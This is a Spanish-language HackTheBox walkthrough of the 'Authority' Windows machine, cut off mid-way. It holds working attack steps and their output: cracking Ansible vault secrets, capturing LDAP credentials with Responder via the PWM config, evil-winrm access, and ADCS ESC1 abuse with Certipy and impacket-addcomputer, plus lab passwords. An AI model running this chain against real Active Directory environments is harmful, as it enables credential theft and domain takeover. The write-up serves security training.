This page looks best with JavaScript enabled

HackTheBox - Authority

 •  ✍️ sckull
featured image

En Authority encontramos informacion encriptada por Ansible en los recursos de SAMBA, tras obtener credenciales en texto plano accedimos a PWM, en este, realizamos cambios a la configuracion de LDAP logrando interceptar credenciales a LDAP. Tras enumerar ADCS con Certipy encontramos una vulnerabilidad ESC1, un usuario no puede realizar la explotacion por lo que realizamos el registro de una computadora con AddComputer, tras modificar el usuario con PassTheCert logramos escalar privilegios.

Nombre Authority box_img_maker
OS

Windows

Puntos 30
Dificultad Media
IP 10.10.11.222
Maker

mrb3n

Sentinal920

Matrix 
{
   "type":"radar",
   "data":{
      "labels":["Enumeration","Real-Life","CVE","Custom Explotation","CTF-Like"],
      "datasets":[
         {
            "label":"User Rate",  "data":[6.9, 7.1, 5.8, 4.2, 2.9],
            "backgroundColor":"rgba(75, 162, 189,0.5)",
            "borderColor":"#4ba2bd"
         },
         {
            "label":"Maker Rate",
            "data":[0, 0, 0, 0, 0],
            "backgroundColor":"rgba(154, 204, 20,0.5)",
            "borderColor":"#9acc14"
         }
      ]
   },
    "options": {"scale": {"ticks": {"backdropColor":"rgba(0,0,0,0)"},
            "angleLines":{"color":"rgba(255, 255, 255,0.6)"},
            "gridLines":{"color":"rgba(255, 255, 255,0.6)"}
        }
    }
}

Recon

nmap

nmap muestra multiples puertos abiertos: dns (53), kerberos (88), ldap (389), smb (139), winrm (5985), ntp (udp/123) y http (8443).

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116

# Nmap 7.93 scan initiated Thu Aug 10 18:07:38 2023 as: nmap -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,8443,9389,47001,49664,49665,49666,49667,49672,49684,49685,49687,49688,49697,49699,49711,54408 -Pn -sV -sC -oN nmap_scan 10.10.11.222
Nmap scan report for 10.10.11.222
Host is up (0.066s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-08-11 02:08:22Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2023-08-11T02:09:28+00:00; +4h00m38s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after:  2024-08-09T23:13:21
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2023-08-11T02:09:27+00:00; +4h00m38s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after:  2024-08-09T23:13:21
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after:  2024-08-09T23:13:21
|_ssl-date: 2023-08-11T02:09:28+00:00; +4h00m38s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: othername: UPN::AUTHORITY$@htb.corp, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after:  2024-08-09T23:13:21
|_ssl-date: 2023-08-11T02:09:27+00:00; +4h00m38s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8443/tcp  open  ssl/https-alt
| ssl-cert: Subject: commonName=172.16.2.118
| Not valid before: 2023-08-08T10:35:07
|_Not valid after:  2025-08-09T22:13:31
|_http-title: Site doesn't have a title (text/html;charset=ISO-8859-1).
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings:
|   FourOhFourRequest, GetRequest:
|     HTTP/1.1 200
|     Content-Type: text/html;charset=ISO-8859-1
|     Content-Length: 82
|     Date: Fri, 11 Aug 2023 02:08:28 GMT
|     Connection: close
|     <html><head><meta http-equiv="refresh" content="0;URL='/pwm'"/></head></html>
|   HTTPOptions:
|     HTTP/1.1 200
|     Allow: GET, HEAD, POST, OPTIONS
|     Content-Length: 0
|     Date: Fri, 11 Aug 2023 02:08:28 GMT
|     Connection: close
|   RTSPRequest:
|     HTTP/1.1 400
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 1936
|     Date: Fri, 11 Aug 2023 02:08:34 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|_    Request</h1><hr class="line" /><p><b>Type</b> Exception Report</p><p><b>Message</b> Invalid character found in the HTTP protocol [RTSP&#47;1.00x0d0x0a0x0d0x0a...]</p><p><b>Description</b> The server cannot or will not process the request due to something that is perceived to be a client error (e.g., malformed request syntax, invalid
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  msrpc         Microsoft Windows RPC
49684/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49685/tcp open  msrpc         Microsoft Windows RPC
49687/tcp open  msrpc         Microsoft Windows RPC
49688/tcp open  msrpc         Microsoft Windows RPC
49697/tcp open  msrpc         Microsoft Windows RPC
49699/tcp open  msrpc         Microsoft Windows RPC
49711/tcp open  msrpc         Microsoft Windows RPC
54408/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
[...]
Service Info: Host: AUTHORITY; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   311:
|_    Message signing enabled and required
|_clock-skew: mean: 4h00m37s, deviation: 0s, median: 4h00m37s
| smb2-time:
|   date: 2023-08-11T02:09:21
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Aug 10 18:08:50 2023 -- 1 IP address (1 host up) scanned in 72.87 seconds

# Nmap 7.93 scan initiated Thu Aug 10 18:07:50 2023 as: nmap -sU --min-rate 10000 -oN nmap_scan_udp 10.10.11.222
Nmap scan report for 10.10.11.222
Host is up (0.066s latency).
Not shown: 998 open|filtered udp ports (no-response)
PORT      STATE  SERVICE
123/udp   open   ntp
44160/udp closed unknown

# Nmap done at Thu Aug 10 18:07:51 2023 -- 1 IP address (1 host up) scanned in 0.82 seconds

Web Site

El puerto 80 muestra el index de IIS.

image

PWM

En el puerto 8084 es diferente, nos muestra multiples mensajes, el primero indica que esta en modo de configuracion lo que permite realizar cambios.

image

Observamos un formulario en el login con dos opciones.

image

Nos redirige a un tipo log que nos muestra informacion de autenticaciones pasadas. Y, un formulario para ingresar por contrasena. Ademas vemos el usuario svc_pwn.

image

Volviendo al formulario “principal” de login, intentamos una combinacion y nos muestra un mensaje de error el cual indica que no se puede realizar la conexion a ldaps://authority.authority.htb:636. En este error obtuvimos un dominio y subdominio: authority.authority.htb, y, un nombre de usuario: svc_ldap.

image

Con la informacion anterior creamos un pequeno wordlist de usuarios.

SMB

Observamos multiples recursos compartidos en el servicio de samba.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

 π ~/htb/authority ❯ smbclient -L 10.10.11.222
Password for [WORKGROUP\kali]:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	Department Shares Disk
	Development     Disk
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share
	SYSVOL          Disk      Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.222 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
 π ~/htb/authority ❯

En “Department Shares” no permite el acceso como usuario anonimo.

1
2
3
4
5
6
7

 π ~/htb/authority ❯ smbclient //10.10.11.222/'Department Shares'
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
smb: \> exit
 π ~/htb/authority ❯

Ansible

En el recurso “Development” encontramos multiples carpetas donde observamos archivos de configuracion de ansible.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

smb: \Automation\Ansible\> ls
  .                                   D        0  Fri Mar 17 09:20:50 2023
  ..                                  D        0  Fri Mar 17 09:20:50 2023
  ADCS                                D        0  Fri Mar 17 09:20:48 2023
  LDAP                                D        0  Fri Mar 17 09:20:48 2023
  PWM                                 D        0  Fri Mar 17 09:20:48 2023
  SHARE                               D        0  Fri Mar 17 09:20:48 2023

    5888511 blocks of size 4096. 1165198 blocks available
smb: \Automation\Ansible\>

En pwm observamos unas credenciales, nombres de usuario, algo muy interesante fueron los “hashes” de Ansible dentro de pwm\defaults\main.yml.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91

# Development\Automation\Ansible\pwm\
# file: ansible_inventory
ansible_user: administrator
ansible_password: Welcome1
ansible_port: 5985
ansible_connection: winrm
ansible_winrm_transport: ntlm
ansible_winrm_server_cert_validation: ignore

# file : ansible.cfg
[defaults]

hostfile = ansible_inventory
remote_user = svc_pwm

gathering = smart

[...]

# file : main.yml
---
- name: Make sure C:\Temp exists
  ansible.windows.win_file:
    path: C:\Temp
    state: directory

- name: Download Java
  ansible.windows.win_get_url:
    url: https://javadl.oracle.com/webapps/download/AutoDL?BundleId=246474_2dee051a5d0647d5be72a7c0abff270e
    dest: C:\Temp\jre-8u333-windows-x64.exe

- name: Download Java
  ansible.windows.win_get_url:
    url: https://github.com/adoptium/temurin17-binaries/releases/download/jdk-17.0.4.1%2B1/OpenJDK17U-jdk_x64_windows_hotspot_17.0.4.1_1.msi
    dest: C:\Temp\OpenJDK17U-jdk_x64_windows_hotspot_17.0.4.1_1.msi

- name: Install Java
  ansible.windows.win_package:
    path: C:\Temp\jre-8u333-windows-x64.exe
    arguments:
      - /s
    state: present

- name: Install Java
  ansible.windows.win_package:
    path: C:\Temp\OpenJDK17U-jdk_x64_windows_hotspot_17.0.4.1_1.msi
    arguments:
      - /quiet
    state: present

- name: Download Tomcat
  ansible.windows.win_get_url:
    url: https://dlcdn.apache.org/tomcat/tomcat-10/v10.0.21/bin/apache-tomcat-10.0.21.exe
    dest: C:\Temp\apache-tomcat-10.0.21.exe
    validate_certs: no

- name: Install Tomcat
  ansible.windows.win_package:
    path: C:\Temp\apache-tomcat-10.0.21.exe
    arguments:
      - /S
    state: present

- name: Configure Tomcat
  template:
    src: templates/tomcat-users.xml.j2
    dest: C:\Program Files\Apache Software Foundation\Tomcat 10.0\conf\tomcat-users.xml

- name: Configure Tomcat
  template:
    src: templates/context.xml.j2
    dest: C:\Program Files\Apache Software Foundation\Tomcat 10.0\webapps\manager\META-INF\context.xml


- name: Download Pwm
  ansible.windows.win_get_url:
    url: https://github.com/pwm-project/pwm/releases/download/v2_0_3/pwm-2.0.3.war
    dest: C:\Program Files\Apache Software Foundation\Tomcat 10.0\webapps\pwm.war
    validate_certs: no

# templates/file :  tomcat-users.xml.j2
<?xml version='1.0' encoding='cp1252'?>

<tomcat-users xmlns="http://tomcat.apache.org/xml" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
 xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
 version="1.0">

<user username="admin" password="T0mc@tAdm1n" roles="manager-gui"/>
<user username="robot" password="T0mc@tR00t" roles="manager-script"/>

</tomcat-users>

Las tres estan descritas (por su nombre) para admin y su contrasena, y una contrasena para ldap.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36

# defaults/file : main.yml
---
pwm_run_dir: "{{ lookup('env', 'PWD') }}"

pwm_hostname: authority.htb.corp
pwm_http_port: "{{ http_port }}"
pwm_https_port: "{{ https_port }}"
pwm_https_enable: true

pwm_require_ssl: false

pwm_admin_login: !vault |
          $ANSIBLE_VAULT;1.1;AES256
          32666534386435366537653136663731633138616264323230383566333966346662313161326239
          6134353663663462373265633832356663356239383039640a346431373431666433343434366139
          35653634376333666234613466396534343030656165396464323564373334616262613439343033
          6334326263326364380a653034313733326639323433626130343834663538326439636232306531
          3438

pwm_admin_password: !vault |
          $ANSIBLE_VAULT;1.1;AES256
          31356338343963323063373435363261323563393235633365356134616261666433393263373736
          3335616263326464633832376261306131303337653964350a363663623132353136346631396662
          38656432323830393339336231373637303535613636646561653637386634613862316638353530
          3930356637306461350a316466663037303037653761323565343338653934646533663365363035
          6531

ldap_uri: ldap://127.0.0.1/
ldap_base_dn: "DC=authority,DC=htb"
ldap_admin_password: !vault |
          $ANSIBLE_VAULT;1.1;AES256
          63303831303534303266356462373731393561313363313038376166336536666232626461653630
          3437333035366235613437373733316635313530326639330a643034623530623439616136363563
          34646237336164356438383034623462323531316333623135383134656263663266653938333334
          3238343230333633350a646664396565633037333431626163306531336336326665316430613566
          3764

Crack Vault Hash

Utilizamos ansible2john.py sobre los valores para obtener en un formato crackeable para john.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

 π ~/htb/authority/vault ❯ for file in *; do /usr/share/john/ansible2john.py $file ; cat "$file"; done
admin_login:$ansible$0*0*2fe48d56e7e16f71c18abd22085f39f4fb11a2b9a456cf4b72ec825fc5b9809d*e041732f9243ba0484f582d9cb20e148*4d1741fd34446a95e647c3fb4a4f9e4400eae9dd25d734abba49403c42bc2cd8
$ANSIBLE_VAULT;1.1;AES256
32666534386435366537653136663731633138616264323230383566333966346662313161326239
6134353663663462373265633832356663356239383039640a346431373431666433343434366139
35653634376333666234613466396534343030656165396464323564373334616262613439343033
6334326263326364380a653034313733326639323433626130343834663538326439636232306531
3438
admin_pass:$ansible$0*0*15c849c20c74562a25c925c3e5a4abafd392c77635abc2ddc827ba0a1037e9d5*1dff07007e7a25e438e94de3f3e605e1*66cb125164f19fb8ed22809393b1767055a66deae678f4a8b1f8550905f70da5
$ANSIBLE_VAULT;1.1;AES256
31356338343963323063373435363261323563393235633365356134616261666433393263373736
3335616263326464633832376261306131303337653964350a363663623132353136346631396662
38656432323830393339336231373637303535613636646561653637386634613862316638353530
3930356637306461350a316466663037303037653761323565343338653934646533663365363035
6531
ldap_pass:$ansible$0*0*c08105402f5db77195a13c1087af3e6fb2bdae60473056b5a477731f51502f93*dfd9eec07341bac0e13c62fe1d0a5f7d*d04b50b49aa665c4db73ad5d8804b4b2511c3b15814ebcf2fe98334284203635
$ANSIBLE_VAULT;1.1;AES256
63303831303534303266356462373731393561313363313038376166336536666232626461653630
3437333035366235613437373733316635313530326639330a643034623530623439616136363563
34646237336164356438383034623462323531316333623135383134656263663266653938333334
3238343230333633350a646664396565633037333431626163306531336336326665316430613566
3764
 π ~/htb/authority/vault ❯

Ejecutamos john y obtuvimos la “master key”.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13

 π ~/htb/authority/vault ❯ john ansible_hashes --wordlist=$ROCK
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (ansible, Ansible Vault [PBKDF2-SHA256 HMAC-256 256/256 AVX2 8x])
Cost 1 (iteration count) is 10000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!@#$%^&*         (admin_pass)
!@#$%^&*         (admin_login)
!@#$%^&*         (ldap_pass)
3g 0:00:00:43 DONE (2023-10-05 15:09) 0.06967g/s 924.4p/s 2773c/s 2773C/s 051790..victor2
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
 π ~/htb/authority/vault ❯

Decrypting - ansible-vault

Utilizamos el comando ansible-vault para desencriptar el contenido.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

 π ~/htb/authority/vault ❯ ansible-vault decrypt admin_login --ask-vault-pass
Vault password:
Decryption successful
 π ~/htb/authority/vault ❯ cat admin_login
svc_pwm
 π ~/htb/authority/vault ❯ ansible-vault decrypt admin_pass --ask-vault-pass
Vault password:
Decryption successful
 π ~/htb/authority/vault ❯ cat admin_pass
pWm_@dm!N_!23
 π ~/htb/authority/vault ❯ ansible-vault decrypt ldap_pass --ask-vault-pass
Vault password:
Decryption successful
 π ~/htb/authority/vault ❯ cat ldap_pass
DevT3st@123
 π ~/htb/authority/vault ❯

Con ello obtuvimos una lista de contrasenas y un usuario ya conocido.

1
2
3

admin_login : svc_pwm
admin_pass : pWm_@dm!N_!23
ldap_pass : DevT3st@123

PWM - Getting the Hash

Al intentar ingresar con las credenciales al sitio este nos sigue mostrando el mensaje de error de conexion. Intentamos por ‘Configuration Manager’, observamos un dashboard con multiples opciones.

image

Se muestra el estado de la plataforma donde tambien muestra un error de conexion en LDAP que ya vimos anteriormente, al parecer PWM intenta autenticarse por LDAP.

image

Si verificamos la configuracion en ‘Configuration Editor’ vemos que es posible editar la direccion IP o agregar una nueva y poner como prioridad esta, tomando en cuenta esto, y que PWM intenta autenticarse por LDAP quiza podriamos agregar nuestra direccion IP y obtener la autenticacion que se intenta realizar.

image
image

Agregamos nuestra direccion IP y la colocamos como prioridad, realizamos ‘Test LDAP Profile’. Al terminar el Test muestra los resultados.

image
image

Por otro lado pusimos en ejecucion responder, que luego de realizar el test encontramos la contrasena para el usuario svc_ldap.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.14.181]
    Responder IPv6             [dead:beef:2::10b3]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']

[+] Current Session Variables:
    Responder Machine Name     [WIN-EB2PPW2IDNN]
    Responder Domain Name      [E36K.LOCAL]
    Responder DCE-RPC Port     [46871]

[+] Listening for events...

[LDAP] Attempting to parse an old simple Bind request.
[LDAP] Cleartext Client   : 10.10.11.222
[LDAP] Cleartext Username : CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htb
[LDAP] Cleartext Password : lDaP_1n_th3_cle4r!
[LDAP] Attempting to parse an old simple Bind request.
[LDAP] Cleartext Client   : 10.10.11.222
[LDAP] Cleartext Username : CN=svc_ldap,OU=Service Accounts,OU=CORP,DC=authority,DC=htb
[LDAP] Cleartext Password : lDaP_1n_th3_cle4r!
[.. snip ..]

User - svc_ldap

Utilizamos evil-wimrm con la contrasena encontrada logrando obtener nuestra flag user.txt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

 π ~/htb/authority ❯ evil-winrm -i 10.10.11.222 -u svc_ldap -p 'lDaP_1n_th3_cle4r!'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_ldap\Documents> whoami
htb\svc_ldap
*Evil-WinRM* PS C:\Users\svc_ldap\Documents> cd ..
*Evil-WinRM* PS C:\Users\svc_ldap> cd Desktop
*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> ls


    Directory: C:\Users\svc_ldap\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        8/10/2023  11:40 PM             34 user.txt


*Evil-WinRM* PS C:\Users\svc_ldap\Desktop> cat user.txt
eabbf33cc1a8155fb68cc0855309011d
*Evil-WinRM* PS C:\Users\svc_ldap\Desktop>

Privesc

Observando los grupos a los que pertenece svc_ldap vemos Certificate Service DCOM Access lo cual nos lleva a ADCS.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44

*Evil-WinRM* PS C:\Users\svc_ldap\Documents> whoami /all

USER INFORMATION
----------------

User Name    SID
============ =============================================
htb\svc_ldap S-1-5-21-622327497-3269355298-2248959698-1601


GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access     Alias            S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\svc_ldap\Documents>

Certipy

Ejecutamos certipy para enumerar plantillas vulnerables en la maquina, vemos que CorpVPN es vulnerable a ESC1, sin embargo hay que mencionar que el usuario actual no puede explotar la vulnerabilidad, en este caso seria una computadora (Domain Computers).

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82

 π ~/htb/authority ❯ certipy find -vulnerable -u svc_ldap@authority.htb -p 'lDaP_1n_th3_cle4r!' -stdout
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 37 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Trying to get CA configuration for 'AUTHORITY-CA' via CSRA
[!] Got error while trying to get CA configuration for 'AUTHORITY-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'AUTHORITY-CA' via RRP
[*] Got CA configuration for 'AUTHORITY-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : AUTHORITY-CA
    DNS Name                            : authority.authority.htb
    Certificate Subject                 : CN=AUTHORITY-CA, DC=authority, DC=htb
    Certificate Serial Number           : 2C4E1F3CA46BBDAF42A1DDE3EC33A6B4
    Certificate Validity Start          : 2023-04-24 01:46:26+00:00
    Certificate Validity End            : 2123-04-24 01:56:25+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : AUTHORITY.HTB\Administrators
      Access Rights
        ManageCa                        : AUTHORITY.HTB\Administrators
                                          AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
        ManageCertificates              : AUTHORITY.HTB\Administrators
                                          AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
        Enroll                          : AUTHORITY.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : CorpVPN
    Display Name                        : Corp VPN
    Certificate Authorities             : AUTHORITY-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          PublishToDs
                                          AutoEnrollmentCheckUserDsCertificate
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Encrypting File System
                                          Secure Email
                                          Client Authentication
                                          Document Signing
                                          IP security IKE intermediate
                                          IP security use
                                          KDC Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 20 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : AUTHORITY.HTB\Domain Computers
                                          AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : AUTHORITY.HTB\Administrator
        Write Owner Principals          : AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
                                          AUTHORITY.HTB\Administrator
        Write Dacl Principals           : AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
                                          AUTHORITY.HTB\Administrator
        Write Property Principals       : AUTHORITY.HTB\Domain Admins
                                          AUTHORITY.HTB\Enterprise Admins
                                          AUTHORITY.HTB\Administrator
    [!] Vulnerabilities
      ESC1                              : 'AUTHORITY.HTB\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
 π ~/htb/authority ❯

Add Computer

Para agregar una computadora utilizamos AddComputer de impacket, verificamos que el valor de la ejecucion del modulo maq sea mayor a 0 lo que nos permitiria como usuarios estandar en crear y registrar una computadora. El resultado es el esperado, mayor a 0.

1
2
3
4
5
6

 π ~/htb/authority/adcs ❯ crackmapexec ldap 10.10.11.222 -u svc_ldap -p 'lDaP_1n_th3_cle4r!' -M maq
SMB         10.10.11.222    445    AUTHORITY        [*] Windows 10.0 Build 17763 x64 (name:AUTHORITY) (domain:authority.htb) (signing:True) (SMBv1:False)
LDAPS       10.10.11.222    636    AUTHORITY        [+] authority.htb\svc_ldap:lDaP_1n_th3_cle4r!
MAQ         10.10.11.222    389    AUTHORITY        [*] Getting the MachineAccountQuota
MAQ         10.10.11.222    389    AUTHORITY        MachineAccountQuota: 10
 π ~/htb/authority/adcs ❯

Primero, sincronizamos nuestra hora con el de la maquina para no tener algun tipo de error.

1
2
3
4

 π BloodHound.py master ❯ sudo ntpdate -u authority.htb
2023-08-11 02:44:05.435 (-0400) +14439.792649 +/- 0.034403 authority.htb 10.10.11.222 s1 no-leap
CLOCK: time stepped by 14439.792649
 π BloodHound.py master ❯

Ejecutamos addcomputer con el nombre de computadora supercomputer contrasena Super5ecret! y pasamos las credenciales de svc_ldap, vemos en el output que fue agregada con exito la computadora.

1
2
3
4
5

 π ~/htb/authority/adcs ❯ impacket-addcomputer -dc-ip 10.10.11.222 -computer-name supercomputer -computer-pass 'Super5ecret!' 'AUTHORITY.HTB/svc_ldap:lDaP_1n_th3_cle4r!'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Successfully added machine account supercomputer$ with password Super5ecret!.
 π ~/htb/authority/adcs ❯

Certipy - ESC1

Ahora ya que tenemos acceso a una computadora podemos realizar la explotacion, especificando credenciales, certificado, template y el usuario administrator.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

 π ~/htb/authority/adcs ❯ certipy req -u 'supercomputer$' -p 'Super5ecret!' -ca authority-ca -target 10.10.11.222 -template CorpVPN -upn administrator@authority.htb  -debug
